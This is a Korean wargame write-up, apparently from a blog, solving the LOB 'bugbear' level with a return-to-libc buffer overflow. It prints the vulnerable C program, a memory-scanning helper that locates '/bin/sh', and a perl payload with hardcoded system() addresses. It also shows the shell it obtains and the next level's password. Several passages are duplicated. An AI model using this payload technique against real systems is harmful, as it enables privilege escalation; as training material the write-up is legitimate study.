기초적인 RTL문제였다.
난이도로 따지면 이전문제보다 더 쉬운정도 ㅋㅋㅋ
system함수를 사용했다.
문제는 다음과 같다.
[darkknight@localhost darkknight]$ cat bugbear.c
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/*
The Lord of the BOF : The Fellowship of the BOF
- bugbear
- RTL1
*/
#include <stdio.h>
#include <stdlib.h>
main(int argc, char *argv[])
{
char buffer[40];
int i;
if(argc < 2){
printf("argv error\n");
exit(0);
}
if(argv[1][47] == '\xbf')
{
printf("stack betrayed you!!\n");
exit(0);
}
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
}
/bin/bash문자열을 찾는 소스는 다음과 같다
int main(int argc,char **argv)
{
long shell;
shell = 0x40058ae0; // system함수의 주소를 넣음.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
{
long shell;
shell = 0x40058ae0; // system함수의 주소를 넣음.
while(memcmp((void *)shell,"/bin/sh",8))shell++;
printf("\"/bin/sh\" is at 0x%x\n",shell);
}
[darkknight@localhost darkknight]$ ./bugbear `perl -e 'print "\xe0\x8a\x05\x40
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
"x12,"aaaa","\xf9\xbf\x0f\x40"'`
?@?@?@?@?@?@?@?@?@?@?@?@aaaa廈@
bash$ id
uid=512(darkknight) gid=512(darkknight) euid=513(bugbear) egid=513(bugbear) grou
ps=512(darkknight)
bash$ my-pass
euid = 513
new divide
OS가 Redhat 6.2라서 system함수 안에 getuid()함수가 없으므로 사용할 수 있었다.
'Wargame > LOB (Redhat9)' 카테고리의 다른 글
| giant -> assassin (0) | 2014.02.20 |
|---|---|
| bugbear -> giant (0) | 2014.02.20 |
| golem -> darkknight (0) | 2014.02.20 |
| skeleton -> golem (0) | 2014.02.20 |
| vampire -> skeleton (0) | 2014.02.20 |
